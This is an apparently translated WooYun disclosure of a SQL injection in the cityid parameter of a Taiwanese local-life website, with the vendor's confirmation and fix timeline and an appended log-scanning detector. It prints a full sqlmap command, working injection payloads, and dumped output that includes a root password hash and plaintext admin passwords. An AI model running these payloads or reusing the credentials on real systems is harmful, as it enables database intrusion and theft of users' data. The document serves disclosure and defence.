
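Vulnerability summary

Vulnerability ID: wooyun-2015-0155825

Vulnerability title: SQL injection vulnerability in the main site of 屏東生活 (DBA privileges | root password leak | large number of users' plaintext passwords leaked) (Taiwan region)

Affected vendor: 屏東生活

Vulnerability author: 路人甲

Submitted: 2015-11-25 15:44

Fixed: 2016-01-05 19:03

Disclosed: 2016-01-05 19:03

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Vulnerability status: Handed over to a third-party partner organization (Hitcon Taiwan Internet vulnerability reporting platform) for handling

Vulnerability source: http://www.wooyun.org. For questions or help, contact [email protected]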



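Vulnerability details

Disclosure status:

2015-11-25: Details reported to the vendor; awaiting vendor response
2015-11-27: Vendor confirmed; details disclosed to the vendor only
2015-12-07: Details disclosed to core white hats and experts in related fields
2015-12-17: Details disclosed to regular white hats
2015-12-27: Details disclosed to intern white hats
2016-01-05: Vendor has fixed the vulnerability and proactively disclosed it; details disclosed to the public

Brief description:

SQL injection vulnerability in the main site of 屏東生活 (DBA privileges | root password leak | large number of users' plaintext passwords leaked)

Detailed description:

URL: http://**.**.**.**/foods/index.php?cityid=5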

$ python sqlmap.py -u "http://**.**.**.**/foods/index.php?cityid=5" -p cityid --technique=BE --random-agent --batch  --current-user --is-dba --users --passwords --count --search -C pass


Proof of vulnerability:

---
Parameter: cityid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cityid=5 AND 8239=8239
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: cityid=5 AND (SELECT 7499 FROM(SELECT COUNT(*),CONCAT(0x716a706a71,(SELECT (ELT(7499=7499,1))),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
current user: 'root@localhost'
current user is DBA: True
database management system users [4]:
[*] ''@'localhost'
[*] ''@'localhost.localdomain'
[*] 'root'@'localhost'
[*] 'root'@'localhost.localdomain'
database management system users password hashes:
[*] root [2]:
password hash: 5b57dbc612de8c44
password hash: NULL
Database: ptnet
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| ad3 | 103266 |
| main | 43597 |
| service | 10148 |
| blog | 1171 |
| country | 365 |
| submain | 296 |
| `user` | 205 |
| title | 151 |
| talk | 115 |
| city | 25 |
| ad2 | 21 |
| showgoods | 20 |
| mapdata | 16 |
| showclass1 | 14 |
| ad | 13 |
| class | 12 |
| showclass | 10 |
| talkclass | 4 |
| admin | 1 |
| pic | 1 |
| showshop | 1 |
+---------------------------------------+---------+
Database: webinfo
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| main | 10912 |
| `pad` | 4144 |
| ad3 | 858 |
| city | 20 |
| ad2 | 19 |
| service | 16 |
| ad | 13 |
| admin | 1 |
| class | 1 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 553 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 126 |
| COLLATIONS | 126 |
| STATISTICS | 79 |
| KEY_COLUMN_USAGE | 76 |
| TABLES | 67 |
| TABLE_CONSTRAINTS | 56 |
| USER_PRIVILEGES | 52 |
| CHARACTER_SETS | 36 |
| SCHEMA_PRIVILEGES | 28 |
| SCHEMATA | 5 |
+---------------------------------------+---------+
Database: mysql
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| `user` | 4 |
| db | 2 |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: ptnet
Table: admin
[1 column]
+----------+
| Column |
+----------+
| password |
+----------+
Database: ptnet
Table: user
[1 column]
+----------+
| Column |
+----------+
| password |
+----------+
Database: webinfo
Table: admin
[1 column]
+----------+
| Column |
+----------+
| password |
+----------+
Database: mysql
Table: user
[1 column]
+----------+
| Column |
+----------+
| Password |
+----------+
Database: ptnet
Table: admin
[1 entry]
+----------+
| password |
+----------+
| admin |
+----------+
Database: ptnet
Table: user
[205 entries]
Database: webinfo
Table: admin
[1 entry]
+----------+
| password |
+----------+
| admin |
+----------+
Database: mysql
Table: user
[4 entries]
+------------------+
| Password |
+------------------+
| 5b57dbc612de8c44 |
| 5b57dbc612de8c44 |
| |
| |
+------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cityid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cityid=5 AND 8239=8239
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: cityid=5 AND (SELECT 7499 FROM(SELECT COUNT(*),CONCAT(0x716a706a71,(SELECT (ELT(7499=7499,1))),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
Database: ptnet
Table: ad3
[10 columns]
+------------+
| Column |
+------------+
| adclass |
| adid |
| adname |
| adtime |
| classid |
| pic |
| pid |
| state |
| subclassid |
| url |
+------------+

Fix:

Deploy a WAF.

Copyright notice: when reposting, please credit the source 路人甲@乌云
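
An added example, not part of the original report: a positive-security check of the kind a WAF rule or log review would apply to the `cityid` parameter, run over constructed access-log lines that reuse the two payloads shown in the proof output. The log lines, client addresses and function names are assumptions; the durable fix remains binding `cityid` as an integer in a parameterized query.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache access-log lines; client addresses are from the documentation
# range, and the two hostile requests reuse the payloads quoted in the report.
SAMPLE_LOG = r'''
192.0.2.10 - - [25/Nov/2015:15:01:02 +0800] "GET /foods/index.php?cityid=5 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.77 - - [25/Nov/2015:15:02:10 +0800] "GET /foods/index.php?cityid=5%20AND%208239%3D8239 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.77 - - [25/Nov/2015:15:02:11 +0800] "GET /foods/index.php?cityid=5%20AND%20(SELECT%207499%20FROM(SELECT%20COUNT(*),CONCAT(0x716a706a71,(SELECT%20(ELT(7499%3D7499,1))),0x716a6a7171,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a) HTTP/1.1" 200 312 "-" "Mozilla/5.0"
192.0.2.11 - - [25/Nov/2015:15:03:00 +0800] "GET /foods/index.php?cityid=12 HTTP/1.1" 200 4890 "-" "Mozilla/5.0"
'''.strip().splitlines()

REQ = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INT_ONLY = re.compile(r'\A[0-9]{1,9}\Z')  # allow-list: cityid is a small unsigned integer
# Markers taken from the two sqlmap payload families shown in the report.
SIGNATURES = [
    ("error-based", re.compile(r'INFORMATION_SCHEMA|FLOOR\s*\(\s*RAND|CONCAT\s*\(', re.I)),
    ("boolean-based", re.compile(r'\b(?:AND|OR)\s+\d+\s*=\s*\d+', re.I)),
]

def classify(value):
    """Return None for a well-formed cityid, else a label for the violation."""
    if INT_ONLY.match(value):
        return None
    for label, pattern in SIGNATURES:
        if pattern.search(value):
            return label
    return "non-integer"

def scan(lines, param="cityid"):
    """Return (client, label, decoded value) for each request that breaks the rule."""
    findings = []
    for line in lines:
        m = REQ.match(line)
        if not m:
            continue
        client, target = m.groups()
        values = parse_qs(urlsplit(target).query, keep_blank_values=True).get(param, [])
        for value in values:
            label = classify(value)
            if label:
                findings.append((client, label, value))
    return findings

if __name__ == "__main__":
    for client, label, value in scan(SAMPLE_LOG):
        print(f"{client}\t{label}\t{value[:60]}")
```

The allow-list does the blocking; the signature labels only help triage, so a request is flagged even when no signature matches.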


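Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 17

Confirmed: 2015-11-27 23:14

Vendor reply:

Thank you for the report

Latest status:

2016-01-05: Fix confirmed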